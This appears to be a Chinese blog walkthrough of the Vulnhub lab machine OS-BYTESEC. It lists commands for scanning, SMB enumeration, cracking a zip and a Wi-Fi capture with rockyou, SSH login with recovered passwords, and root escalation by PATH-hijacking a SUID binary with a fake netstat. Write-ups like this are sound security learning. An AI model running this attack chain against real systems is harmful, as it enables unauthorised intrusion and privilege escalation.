前言

Vulnhub刷题简单记录

OS-BYTESEC

描述
难度：中级

标志：引导根

学习：利用 | 网络应用安全| 权限提升

https://www.vulnhub.com/entry/hacknos-os-hax,389/

OS-BYTESEC

1、可以用两种方法确认靶场的存在，扫ip

netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

nmap -sV -sC -A 192.168.136.150 -o os-ByteSec

3、访问主页，根据提示说有一个password_resets，我们扫一下目录情况

gobuster dir -u http://192.168.136.150/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 2
00

dirb http://192.168.1.104/

dirsearch -u 192.168.136.150 -e*  -x 403

4、通过smbmap查看共享文件，也可以用 enum4linux来全方面枚举信息

smbmap -H 192.168.136.150
enum4linux 192.168.136.150

S-1-22-1-1000 Unix User\sagar (Local User)
S-1-22-1-1001 Unix User\blackjax (Local User)
S-1-22-1-1002 Unix User\smb (Local User)

5、根据主页的提示smb无密码，所以直接用smbclient登陆

6、接着获取其中的文件

7、破解zip密码hacker1

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

xdg-open secret.jpg

7、破解包，发现了blackjax的密码为snowflake

aircrack-ng -w /usr/share/wordlist/rockyou.txt user.cap

接着ssh登陆，一开始扫出的ssh端口为2525

7、看看能不能suid提权

find / type f -perm -u=s 2>/dev/null

xxd /usr/bin/netscan | less #查看发现其调用netstat -antp 命令

8、利用环境命令的劫持，来让我们提升到root权限

blackjax@nitin:/tmp$ echo "/bin/sh" > netstat

blackjax@nitin:/tmp$ chmod 777 netstat

blackjax@nitin:/tmp$ ls
netstat  systemd-private-bb2ad2734f824feba859caafc338a835-systemd-timesyncd.service-4xDQxg  vmware-root

blackjax@nitin:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

blackjax@nitin:/tmp$ export PATH=/tmp:$PATH

blackjax@nitin:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

blackjax@nitin:/tmp$ netscan

我的个人博客

孤桜懶契：http://gylq.gitee.io

Run

【Vulnhub】靶机OS-BYTESEC

前言

OS-BYTESEC

描述

OS-BYTESEC

我的个人博客

孤桜懶契：http://gylq.gitee.io